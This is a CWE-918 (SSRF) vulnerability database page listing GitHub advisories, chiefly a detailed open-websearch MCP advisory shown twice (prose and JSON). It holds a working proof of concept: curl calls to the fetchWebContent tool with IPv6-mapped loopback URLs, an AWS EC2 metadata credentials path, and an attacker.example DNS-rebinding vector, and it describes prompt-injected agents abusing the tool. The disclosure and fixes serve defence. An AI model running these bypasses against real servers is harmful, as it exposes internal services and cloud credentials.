Common Weakness Enumeration

CWE-918

Allowed

Server-Side Request Forgery (SSRF)

Abstraction: Base · Status: Incomplete

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.

4625 vulnerabilities reference this CWE, most recent first.

GHSA-RXCQ-Q6Q7-HM9R

Vulnerability from github – Published: 2026-02-05 00:31 – Updated: 2026-02-05 00:31
VLAI
Details

A weakness has been identified in ZenTao up to 21.7.6-85642. The impacted element is the function fetchHook of the file module/webhook/model.php of the component Webhook Module. This manipulation causes server-side request forgery. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-1884"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-04T22:15:57Z",
    "severity": "MODERATE"
  },
  "details": "A weakness has been identified in ZenTao up to 21.7.6-85642. The impacted element is the function fetchHook of the file module/webhook/model.php of the component Webhook Module. This manipulation causes server-side request forgery. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-rxcq-q6q7-hm9r",
  "modified": "2026-02-05T00:31:00Z",
  "published": "2026-02-05T00:31:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1884"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ez-lbz/ez-lbz.github.io/issues/9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ez-lbz/ez-lbz.github.io/issues/9#issue-3832844574"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.344264"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.344264"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.742633"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-RXJG-Q5C5-6Q8F

Vulnerability from github – Published: 2022-04-27 00:00 – Updated: 2022-05-06 00:01
VLAI
Details

Monstaftp v2.10.3 was discovered to allow attackers to execute Server-Side Request Forgery (SSRF).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-27469"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-04-26T14:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Monstaftp v2.10.3 was discovered to allow attackers to execute Server-Side Request Forgery (SSRF).",
  "id": "GHSA-rxjg-q5c5-6q8f",
  "modified": "2022-05-06T00:01:10Z",
  "published": "2022-04-27T00:00:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27469"
    },
    {
      "type": "WEB",
      "url": "https://www.monstaftp.com"
    },
    {
      "type": "WEB",
      "url": "https://www.youtube.com/playlist?list=PLGCNgyyYX0yG9rF3Pd72H7qE9sfRA7d_i"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V228-72C7-FX8J

Vulnerability from github – Published: 2026-05-05 20:51 – Updated: 2026-05-13 16:24
VLAI
Summary
open-websearch has SSRF in `fetchWebContent` MCP tool: bracketed IPv6 literals and non-resolving hostname check bypass `isPrivateOrLocalHostname`
Details

Summary

src/utils/urlSafety.ts exposes isPublicHttpUrl / assertPublicHttpUrl, used to gate the MCP fetchWebContent tool against private-network targets. The check has two defects that together allow non-blind SSRF with the response body returned to the caller:

  1. Bracketed IPv6 literals are never recognized. Node's WHATWG URL.hostname keeps the surrounding […] for IPv6 literals. isIP("[::1]") returns 0 (not 6), so neither isPrivateIpv4 nor isPrivateIpv6 is ever called on an IPv6 literal input — including [::1] itself, and including every IPv4-mapped form such as [::ffff:7f00:1] (= 127.0.0.1 via the IPv4 stack).
  2. No DNS resolution. isPrivateOrLocalHostname only inspects the literal hostname string. It never resolves the host to an IP. Any attacker-controlled hostname whose DNS record points at 127.0.0.1 (or any RFC1918 / link-local address) passes the check unchanged, and axios then performs its own resolution and connects to the private address.

The isPrivateIpv6 implementation also has the hex bypass (it would miss ::ffff:7f00:1 even if reached) but defect (1) makes every bracketed IPv6 literal slip past before that branch is even entered.

The fetchWebContent tool returns the response body (JSON.stringify(result)) to the MCP caller, so the SSRF is non-blind.

Details

Vulnerable functionsrc/utils/urlSafety.ts:95-119:

export function isPrivateOrLocalHostname(hostname: string): boolean {
  const host = hostname.trim().toLowerCase();
  if (!host) return true;
  if (host === 'localhost' || host.endsWith('.localhost')) return true;
  if (host === 'metadata.google.internal' || host === 'metadata.azure.internal') return true;
  const integerIp = parseIntegerIpv4Literal(host);
  if (integerIp && isPrivateIpv4(integerIp)) return true;
  if (isPrivateOrLocalIp(host)) return true;   // only runs if isIP(host) ∈ {4, 6}
  return false;
}

isPrivateOrLocalIpsrc/utils/urlSafety.ts:84-93:

function isPrivateOrLocalIp(ip: string): boolean {
  const version = isIP(ip);  // returns 0 for "[::1]", "[::ffff:7f00:1]", any bracketed literal
  if (version === 4) return isPrivateIpv4(ip);
  if (version === 6) return isPrivateIpv6(ip);
  return false;
}

Caller — src/tools/setupTools.ts:252-286 (fetchWebContent tool):

server.tool(
  fetchWebToolName,  // default: "fetchWebContent"
  "Fetch content from a public HTTP(S) URL ...",
  { url: z.string().url().refine(
      (url) => validatePublicWebUrl(url),   // → isPublicHttpUrl → isPrivateOrLocalHostname
      "URL must be a public HTTP(S) address ..."
    ), /* … */ },
  async ({url, maxChars}) => {
    const result = await runtime.services.fetchWeb.execute({ url, maxChars, /*…*/ });
    return { content: [{ type: 'text', text: JSON.stringify(result, null, 2) }] };
  }
);

Service — src/engines/web/fetchWebContent.ts:313-375: re-validates via assertPublicHttpUrl (same broken check), then calls axios.head + axios.get on the raw URL and returns response.data and response.headers to the caller.

Transport — src/index.ts:85-253: when config.enableHttpServer is true (documented configuration; enabled by the Docker image), the MCP server binds on 0.0.0.0:${PORT} (default 3000) with CORS origin: '*' and no authentication on /mcp (Streamable HTTP) or /sse (legacy SSE). Anyone who can reach the port can invoke any tool.

Verification of the validator (run against current HEAD)

I executed the real isPublicHttpUrl / assertPublicHttpUrl from src/utils/urlSafety.ts under tsx against a set of inputs:

Input URL parsed.hostname isPublicHttpUrl assertPublicHttpUrl
http://[::ffff:7f00:1]/ (127.0.0.1) [::ffff:7f00:1] true ← bypass PASSED ← bypass
http://[::ffff:a9fe:1]/ (169.254.0.1) [::ffff:a9fe:1] true ← bypass PASSED ← bypass
http://[::ffff:a00:1]/ (10.0.0.1) [::ffff:a00:1] true ← bypass PASSED ← bypass
http://[::ffff:127.0.0.1]/ [::ffff:7f00:1] true ← bypass PASSED ← bypass
http://[0:0:0:0:0:0:0:1]/ [::1] true ← bypass PASSED ← bypass
http://[::1]/ (plain loopback!) [::1] true ← bypass PASSED ← bypass
http://127.0.0.1/ (control) 127.0.0.1 false (blocked) threw (blocked)
http://localhost/ (control) localhost false (blocked) threw (blocked)

WHATWG new URL("http://[::ffff:127.0.0.1]/").hostname returns [::ffff:7f00:1] — note that Node's URL parser actively re-encodes the dotted form to hex, helping the bypass. Every bracketed IPv6 literal passes the validator.

Verification of the fetch (Node 22/25)

I bound a trivial HTTP server to 127.0.0.1:29999 and called axios.get("http://[::ffff:7f00:1]:29999/") from Node; the request reached the server:

  HIT: / from 127.0.0.1 family IPv4
http://[::ffff:7f00:1]:29999/ -> 200 <html>internal content</html>

The OS routes ::ffff:X.X.X.X connections through the IPv4 stack, so the PoC works identically across macOS and Linux.

Environment: clean clone of Aas-ee/open-webSearch@HEAD, Node 22+.

1. Start the MCP HTTP server.

git clone https://github.com/Aas-ee/open-webSearch.git
cd open-webSearch
npm install && npm run build
MODE=http PORT=3000 node build/index.js &

2. Stand up a canary on loopback.

node -e '
  require("http").createServer((q,r)=>{
    console.log("[canary]", q.method, q.url, "from", q.socket.remoteAddress);
    r.writeHead(200, {"content-type":"text/html"});
    r.end("INTERNAL-SECRET: canary-hit for " + q.url);
  }).listen(19999, "127.0.0.1", () => console.log("canary on 127.0.0.1:19999"));
' &

3. Open an MCP session and call fetchWebContent with the bypass URL.

# Accept header must include both JSON and SSE for Streamable HTTP transport.
ACCEPT='application/json, text/event-stream'

# initialize → grab the mcp-session-id header
SID=$(curl -sSD - -o /dev/null -X POST http://127.0.0.1:3000/mcp \
  -H "Accept: $ACCEPT" -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-03-26","capabilities":{},"clientInfo":{"name":"poc","version":"0"}}}' \
  | awk 'tolower($1)=="mcp-session-id:" { gsub(/\r/,""); print $2 }')

# notifications/initialized
curl -sS -X POST http://127.0.0.1:3000/mcp \
  -H "Accept: $ACCEPT" -H 'Content-Type: application/json' -H "mcp-session-id: $SID" \
  -d '{"jsonrpc":"2.0","method":"notifications/initialized","params":{}}' >/dev/null

# call fetchWebContent with the SSRF bypass URL
curl -sS -X POST http://127.0.0.1:3000/mcp \
  -H "Accept: $ACCEPT" -H 'Content-Type: application/json' -H "mcp-session-id: $SID" \
  -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{
        "name":"fetchWebContent",
        "arguments":{"url":"http://[::ffff:7f00:1]:19999/internal","maxChars":10000}
      }}'

Expected result: the canary logs [canary] GET /internal from 127.0.0.1, and the MCP response contains INTERNAL-SECRET: canary-hit for /internal in the tool's content[0].text.

Additional bypass vectors that work the same way:

  • http://[::1]:<port>/ — plain IPv6 loopback.
  • http://[::ffff:a9fe:1]/latest/meta-data/iam/security-credentials/ — AWS EC2 metadata over the IPv4 stack.
  • http://attacker.example/ where attacker.example has A/AAAA pointing at any private address — bypasses via defect (2), no IPv6 trick needed.

Impact

  • Cross-tenant SSRF with full response body. Any client that can speak MCP to the HTTP transport can fetch arbitrary private-network URLs and receive the response body. AWS EC2 metadata, internal dashboards, loopback services, RFC1918 neighbours — all in scope.
  • Pre-auth when enableHttpServer is set. No authentication layer exists on /mcp or /sse; CORS is *.
  • DNS-rebinding / LAN-victim angle. Because /mcp is CORS * and accepts POST, a victim who visits an attacker-controlled webpage while running open-webSearch locally will have their browser used to send tool-call requests, and the tool's response can be exfiltrated back via a simple XHR.
  • Exploitable over stdio too. Even with HTTP disabled, a compromised or prompt-injected MCP client can call fetchWebContent against loopback on the host running the server — a realistic LLM-agent-abuse vector.

No meaningful mitigation in the call chain: only http:// and https:// schemes are accepted, but that is not a restriction for SSRF.

Suggested fix

Two changes, either of which individually closes most of the gap; both together close it fully.

  1. Normalize the hostname before IP checks, and perform a DNS resolution. Use the ip-address package or a similar canonicalizer, and reject any getaddrinfo result whose IP falls in a private CIDR. Keep a bracket-stripping step for IPv6 literals before calling isIP().

    ```ts import { lookup } from 'node:dns/promises'; import { Address4, Address6 } from 'ip-address';

    function stripBrackets(h: string): string { return h.startsWith('[') && h.endsWith(']') ? h.slice(1, -1) : h; }

    const BLOCKED_V6_CIDRS = [ '::1/128', '::/128', 'fc00::/7', 'fe80::/10', '2001:db8::/32', '2002::/16', '64:ff9b::/96', '100::/64', 'ff00::/8', '::ffff:0:0/96', // IPv4-mapped — delegate to v4 check ];

    function ipv6IsPrivate(addr6: Address6): boolean { const v4 = addr6.to4(); if (v4 && v4.isValid()) return isPrivateIpv4(v4.address); return BLOCKED_V6_CIDRS.some(cidr => addr6.isInSubnet(new Address6(cidr))); }

    export async function assertPublicHttpUrl(url: URL | string, label = 'URL') { const parsed = typeof url === 'string' ? new URL(url) : url; if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') throw …; const host = stripBrackets(parsed.hostname);

    // Literal IP case. const v = isIP(host); if (v === 4 && isPrivateIpv4(host)) throw …; if (v === 6 && ipv6IsPrivate(new Address6(host))) throw …;

    if (v === 0) { // Hostname — resolve and check every record. const records = await lookup(host, { all: true, verbatim: true }); for (const r of records) { if (r.family === 4 && isPrivateIpv4(r.address)) throw …; if (r.family === 6 && ipv6IsPrivate(new Address6(r.address))) throw …; } } } ```

  2. Dual-pin the connection. Even a perfect pre-connect check has TOCTOU gaps (DNS rebinding between check and axios.get). Use a custom undici Agent whose connect hook validates the actual connected socket IP via socket.remoteAddress. That closes the rebinding window.

  3. Gate the HTTP transport. Require a bearer token (env var) on /mcp and /sse, and restrict binding to 127.0.0.1 by default. CORS * plus no-auth on 0.0.0.0 is the same exposure profile as an unauthenticated open proxy.

Test vectors to add to the suite:

```ts for (const url of [ 'http://[::1]/', 'http://[::]/', 'http://[::ffff:127.0.0.1]/', 'http://[::ffff:7f00:1]/', 'http://[0:0:0:0:0:ffff:127.0.0.1]/', 'http://[0:0:0:0:0:0:0:1]/', 'http://[::0:1]/', 'http://[0:0::1]/', 'http://[::ffff:a00:1]/', 'http://[::ffff:c0a8:1]/', 'http://[::ffff:a9fe:1]/', ]) expect(isPublicHttpUrl(url)).toBe(false);

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.1.6"
      },
      "package": {
        "ecosystem": "npm",
        "name": "open-websearch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.1.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42260"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-693",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T20:51:45Z",
    "nvd_published_at": "2026-05-12T15:16:15Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n`src/utils/urlSafety.ts` exposes `isPublicHttpUrl` / `assertPublicHttpUrl`, used to gate the MCP `fetchWebContent` tool against private-network targets. The check has two defects that together allow **non-blind SSRF with the response body returned to the caller**:\n\n1. **Bracketed IPv6 literals are never recognized.** Node\u0027s WHATWG `URL.hostname` keeps the surrounding `[\u2026]` for IPv6 literals. `isIP(\"[::1]\")` returns 0 (not 6), so neither `isPrivateIpv4` nor `isPrivateIpv6` is ever called on an IPv6 literal input \u2014 including `[::1]` itself, and including every IPv4-mapped form such as `[::ffff:7f00:1]` (= 127.0.0.1 via the IPv4 stack).\n2. **No DNS resolution.** `isPrivateOrLocalHostname` only inspects the literal `hostname` string. It never resolves the host to an IP. Any attacker-controlled hostname whose DNS record points at 127.0.0.1 (or any RFC1918 / link-local address) passes the check unchanged, and `axios` then performs its own resolution and connects to the private address.\n\nThe `isPrivateIpv6` implementation also has the hex bypass (it would miss `::ffff:7f00:1` even if reached) but defect (1) makes every bracketed IPv6 literal slip past before that branch is even entered.\n\nThe `fetchWebContent` tool returns the response body (`JSON.stringify(result)`) to the MCP caller, so the SSRF is non-blind.\n\n### Details\n\u003c!-- obsidian --\u003e\u003cp\u003e\u003cstrong\u003eVulnerable function\u003c/strong\u003e \u2014 \u003ccode\u003esrc/utils/urlSafety.ts:95-119\u003c/code\u003e:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-ts\"\u003eexport function isPrivateOrLocalHostname(hostname: string): boolean {\n  const host = hostname.trim().toLowerCase();\n  if (!host) return true;\n  if (host === \u0027localhost\u0027 || host.endsWith(\u0027.localhost\u0027)) return true;\n  if (host === \u0027metadata.google.internal\u0027 || host === \u0027metadata.azure.internal\u0027) return true;\n  const integerIp = parseIntegerIpv4Literal(host);\n  if (integerIp \u0026#x26;\u0026#x26; isPrivateIpv4(integerIp)) return true;\n  if (isPrivateOrLocalIp(host)) return true;   // only runs if isIP(host) \u2208 {4, 6}\n  return false;\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003ccode\u003eisPrivateOrLocalIp\u003c/code\u003e \u2014 \u003ccode\u003esrc/utils/urlSafety.ts:84-93\u003c/code\u003e:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-ts\"\u003efunction isPrivateOrLocalIp(ip: string): boolean {\n  const version = isIP(ip);  // returns 0 for \"[::1]\", \"[::ffff:7f00:1]\", any bracketed literal\n  if (version === 4) return isPrivateIpv4(ip);\n  if (version === 6) return isPrivateIpv6(ip);\n  return false;\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eCaller \u2014 \u003ccode\u003esrc/tools/setupTools.ts:252-286\u003c/code\u003e (\u003ccode\u003efetchWebContent\u003c/code\u003e tool):\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-ts\"\u003eserver.tool(\n  fetchWebToolName,  // default: \"fetchWebContent\"\n  \"Fetch content from a public HTTP(S) URL ...\",\n  { url: z.string().url().refine(\n      (url) =\u003e validatePublicWebUrl(url),   // \u2192 isPublicHttpUrl \u2192 isPrivateOrLocalHostname\n      \"URL must be a public HTTP(S) address ...\"\n    ), /* \u2026 */ },\n  async ({url, maxChars}) =\u003e {\n    const result = await runtime.services.fetchWeb.execute({ url, maxChars, /*\u2026*/ });\n    return { content: [{ type: \u0027text\u0027, text: JSON.stringify(result, null, 2) }] };\n  }\n);\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eService \u2014 \u003ccode\u003esrc/engines/web/fetchWebContent.ts:313-375\u003c/code\u003e: re-validates via \u003ccode\u003eassertPublicHttpUrl\u003c/code\u003e (same broken check), then calls \u003ccode\u003eaxios.head\u003c/code\u003e + \u003ccode\u003eaxios.get\u003c/code\u003e on the raw URL and returns \u003ccode\u003eresponse.data\u003c/code\u003e and \u003ccode\u003eresponse.headers\u003c/code\u003e to the caller.\u003c/p\u003e\n\u003cp\u003eTransport \u2014 \u003ccode\u003esrc/index.ts:85-253\u003c/code\u003e: when \u003ccode\u003econfig.enableHttpServer\u003c/code\u003e is true (documented configuration; enabled by the Docker image), the MCP server binds on \u003ccode\u003e0.0.0.0:${PORT}\u003c/code\u003e (default \u003ccode\u003e3000\u003c/code\u003e) with CORS \u003ccode\u003eorigin: \u0027*\u0027\u003c/code\u003e and \u003cstrong\u003eno authentication\u003c/strong\u003e on \u003ccode\u003e/mcp\u003c/code\u003e (Streamable HTTP) or \u003ccode\u003e/sse\u003c/code\u003e (legacy SSE). Anyone who can reach the port can invoke any tool.\u003c/p\u003e\n\u003ch3 data-heading=\"Verification of the validator (run against current \u0026#x60;HEAD\u0026#x60;)\"\u003eVerification of the validator (run against current \u003ccode\u003eHEAD\u003c/code\u003e)\u003c/h3\u003e\n\u003cp\u003eI executed the real \u003ccode\u003eisPublicHttpUrl\u003c/code\u003e / \u003ccode\u003eassertPublicHttpUrl\u003c/code\u003e from \u003ccode\u003esrc/utils/urlSafety.ts\u003c/code\u003e under \u003ccode\u003etsx\u003c/code\u003e against a set of inputs:\u003c/p\u003e\n\nInput URL | parsed.hostname | isPublicHttpUrl | assertPublicHttpUrl\n-- | -- | -- | --\nhttp://[::ffff:7f00:1]/ (127.0.0.1) | [::ffff:7f00:1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[::ffff:a9fe:1]/ (169.254.0.1) | [::ffff:a9fe:1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[::ffff:a00:1]/ (10.0.0.1) | [::ffff:a00:1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[::ffff:127.0.0.1]/ | [::ffff:7f00:1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[0:0:0:0:0:0:0:1]/ | [::1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[::1]/ (plain loopback!) | [::1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://127.0.0.1/ (control) | 127.0.0.1 | false (blocked) | threw (blocked)\nhttp://localhost/ (control) | localhost | false (blocked) | threw (blocked)\n\n\n\u003cp\u003eWHATWG \u003ccode\u003enew URL(\"http://[::ffff:127.0.0.1]/\").hostname\u003c/code\u003e returns \u003ccode\u003e[::ffff:7f00:1]\u003c/code\u003e \u2014 note that Node\u0027s URL parser actively re-encodes the dotted form to hex, helping the bypass. Every bracketed IPv6 literal passes the validator.\u003c/p\u003e\n\u003ch3 data-heading=\"Verification of the fetch (Node 22/25)\"\u003eVerification of the fetch (Node 22/25)\u003c/h3\u003e\n\u003cp\u003eI bound a trivial HTTP server to \u003ccode\u003e127.0.0.1:29999\u003c/code\u003e and called \u003ccode\u003eaxios.get(\"http://[::ffff:7f00:1]:29999/\")\u003c/code\u003e from Node; the request reached the server:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e  HIT: / from 127.0.0.1 family IPv4\nhttp://[::ffff:7f00:1]:29999/ -\u003e 200 \u0026#x3C;html\u003einternal content\u0026#x3C;/html\u003e\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eThe OS routes \u003ccode\u003e::ffff:X.X.X.X\u003c/code\u003e connections through the IPv4 stack, so the PoC works identically across macOS and Linux.\u003c/p\u003e\n\nEnvironment: clean clone of `Aas-ee/open-webSearch@HEAD`, Node 22+.\n\n**1. Start the MCP HTTP server.**\n\n```bash\ngit clone https://github.com/Aas-ee/open-webSearch.git\ncd open-webSearch\nnpm install \u0026\u0026 npm run build\nMODE=http PORT=3000 node build/index.js \u0026\n```\n\n**2. Stand up a canary on loopback.**\n\n```bash\nnode -e \u0027\n  require(\"http\").createServer((q,r)=\u003e{\n    console.log(\"[canary]\", q.method, q.url, \"from\", q.socket.remoteAddress);\n    r.writeHead(200, {\"content-type\":\"text/html\"});\n    r.end(\"INTERNAL-SECRET: canary-hit for \" + q.url);\n  }).listen(19999, \"127.0.0.1\", () =\u003e console.log(\"canary on 127.0.0.1:19999\"));\n\u0027 \u0026\n```\n\n**3. Open an MCP session and call `fetchWebContent` with the bypass URL.**\n\n```bash\n# Accept header must include both JSON and SSE for Streamable HTTP transport.\nACCEPT=\u0027application/json, text/event-stream\u0027\n\n# initialize \u2192 grab the mcp-session-id header\nSID=$(curl -sSD - -o /dev/null -X POST http://127.0.0.1:3000/mcp \\\n  -H \"Accept: $ACCEPT\" -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"initialize\",\"params\":{\"protocolVersion\":\"2025-03-26\",\"capabilities\":{},\"clientInfo\":{\"name\":\"poc\",\"version\":\"0\"}}}\u0027 \\\n  | awk \u0027tolower($1)==\"mcp-session-id:\" { gsub(/\\r/,\"\"); print $2 }\u0027)\n\n# notifications/initialized\ncurl -sS -X POST http://127.0.0.1:3000/mcp \\\n  -H \"Accept: $ACCEPT\" -H \u0027Content-Type: application/json\u0027 -H \"mcp-session-id: $SID\" \\\n  -d \u0027{\"jsonrpc\":\"2.0\",\"method\":\"notifications/initialized\",\"params\":{}}\u0027 \u003e/dev/null\n\n# call fetchWebContent with the SSRF bypass URL\ncurl -sS -X POST http://127.0.0.1:3000/mcp \\\n  -H \"Accept: $ACCEPT\" -H \u0027Content-Type: application/json\u0027 -H \"mcp-session-id: $SID\" \\\n  -d \u0027{\"jsonrpc\":\"2.0\",\"id\":2,\"method\":\"tools/call\",\"params\":{\n        \"name\":\"fetchWebContent\",\n        \"arguments\":{\"url\":\"http://[::ffff:7f00:1]:19999/internal\",\"maxChars\":10000}\n      }}\u0027\n```\n\nExpected result: the canary logs `[canary] GET /internal from 127.0.0.1`, and the MCP response contains `INTERNAL-SECRET: canary-hit for /internal` in the tool\u0027s `content[0].text`.\n\nAdditional bypass vectors that work the same way:\n\n- `http://[::1]:\u003cport\u003e/` \u2014 plain IPv6 loopback.\n- `http://[::ffff:a9fe:1]/latest/meta-data/iam/security-credentials/` \u2014 AWS EC2 metadata over the IPv4 stack.\n- `http://attacker.example/` where `attacker.example` has A/AAAA pointing at any private address \u2014 bypasses via defect (2), no IPv6 trick needed.\n\n### Impact\n\n- **Cross-tenant SSRF with full response body.** Any client that can speak MCP to the HTTP transport can fetch arbitrary private-network URLs and receive the response body. AWS EC2 metadata, internal dashboards, loopback services, RFC1918 neighbours \u2014 all in scope.\n- **Pre-auth when `enableHttpServer` is set.** No authentication layer exists on `/mcp` or `/sse`; CORS is `*`.\n- **DNS-rebinding / LAN-victim angle.** Because `/mcp` is CORS `*` and accepts `POST`, a victim who visits an attacker-controlled webpage while running open-webSearch locally will have their browser used to send tool-call requests, and the tool\u0027s response can be exfiltrated back via a simple XHR.\n- **Exploitable over stdio too.** Even with HTTP disabled, a compromised or prompt-injected MCP client can call `fetchWebContent` against loopback on the host running the server \u2014 a realistic LLM-agent-abuse vector.\n\nNo meaningful mitigation in the call chain: only `http://` and `https://` schemes are accepted, but that is not a restriction for SSRF.\n\n### Suggested fix\n\nTwo changes, either of which individually closes most of the gap; both together close it fully.\n\n1. **Normalize the hostname before IP checks, and perform a DNS resolution.** Use the `ip-address` package or a similar canonicalizer, and reject any `getaddrinfo` result whose IP falls in a private CIDR. Keep a bracket-stripping step for IPv6 literals before calling `isIP()`.\n\n    ```ts\n    import { lookup } from \u0027node:dns/promises\u0027;\n    import { Address4, Address6 } from \u0027ip-address\u0027;\n\n    function stripBrackets(h: string): string {\n      return h.startsWith(\u0027[\u0027) \u0026\u0026 h.endsWith(\u0027]\u0027) ? h.slice(1, -1) : h;\n    }\n\n    const BLOCKED_V6_CIDRS = [\n      \u0027::1/128\u0027, \u0027::/128\u0027,\n      \u0027fc00::/7\u0027, \u0027fe80::/10\u0027,\n      \u00272001:db8::/32\u0027, \u00272002::/16\u0027, \u002764:ff9b::/96\u0027,\n      \u0027100::/64\u0027, \u0027ff00::/8\u0027,\n      \u0027::ffff:0:0/96\u0027,   // IPv4-mapped \u2014 delegate to v4 check\n    ];\n\n    function ipv6IsPrivate(addr6: Address6): boolean {\n      const v4 = addr6.to4();\n      if (v4 \u0026\u0026 v4.isValid()) return isPrivateIpv4(v4.address);\n      return BLOCKED_V6_CIDRS.some(cidr =\u003e addr6.isInSubnet(new Address6(cidr)));\n    }\n\n    export async function assertPublicHttpUrl(url: URL | string, label = \u0027URL\u0027) {\n      const parsed = typeof url === \u0027string\u0027 ? new URL(url) : url;\n      if (parsed.protocol !== \u0027http:\u0027 \u0026\u0026 parsed.protocol !== \u0027https:\u0027) throw \u2026;\n      const host = stripBrackets(parsed.hostname);\n\n      // Literal IP case.\n      const v = isIP(host);\n      if (v === 4 \u0026\u0026 isPrivateIpv4(host)) throw \u2026;\n      if (v === 6 \u0026\u0026 ipv6IsPrivate(new Address6(host))) throw \u2026;\n\n      if (v === 0) {\n        // Hostname \u2014 resolve and check every record.\n        const records = await lookup(host, { all: true, verbatim: true });\n        for (const r of records) {\n          if (r.family === 4 \u0026\u0026 isPrivateIpv4(r.address)) throw \u2026;\n          if (r.family === 6 \u0026\u0026 ipv6IsPrivate(new Address6(r.address))) throw \u2026;\n        }\n      }\n    }\n    ```\n\n2. **Dual-pin the connection.** Even a perfect pre-connect check has TOCTOU gaps (DNS rebinding between check and `axios.get`). Use a custom `undici` `Agent` whose `connect` hook validates the actual connected socket IP via `socket.remoteAddress`. That closes the rebinding window.\n\n3. **Gate the HTTP transport.** Require a bearer token (env var) on `/mcp` and `/sse`, and restrict binding to `127.0.0.1` by default. CORS `*` plus no-auth on `0.0.0.0` is the same exposure profile as an unauthenticated open proxy.\n\nTest vectors to add to the suite:\n\n```ts\nfor (const url of [\n  \u0027http://[::1]/\u0027, \u0027http://[::]/\u0027,\n  \u0027http://[::ffff:127.0.0.1]/\u0027, \u0027http://[::ffff:7f00:1]/\u0027,\n  \u0027http://[0:0:0:0:0:ffff:127.0.0.1]/\u0027,\n  \u0027http://[0:0:0:0:0:0:0:1]/\u0027, \u0027http://[::0:1]/\u0027, \u0027http://[0:0::1]/\u0027,\n  \u0027http://[::ffff:a00:1]/\u0027, \u0027http://[::ffff:c0a8:1]/\u0027, \u0027http://[::ffff:a9fe:1]/\u0027,\n]) expect(isPublicHttpUrl(url)).toBe(false);",
  "id": "GHSA-v228-72c7-fx8j",
  "modified": "2026-05-13T16:24:33Z",
  "published": "2026-05-05T20:51:45Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Aas-ee/open-webSearch/security/advisories/GHSA-v228-72c7-fx8j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42260"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Aas-ee/open-webSearch"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "open-websearch has SSRF in `fetchWebContent` MCP tool: bracketed IPv6 literals and non-resolving hostname check bypass `isPrivateOrLocalHostname`"
}

GHSA-V2C6-3PHC-2R62

Vulnerability from github – Published: 2026-05-07 18:30 – Updated: 2026-05-07 18:30
VLAI
Details

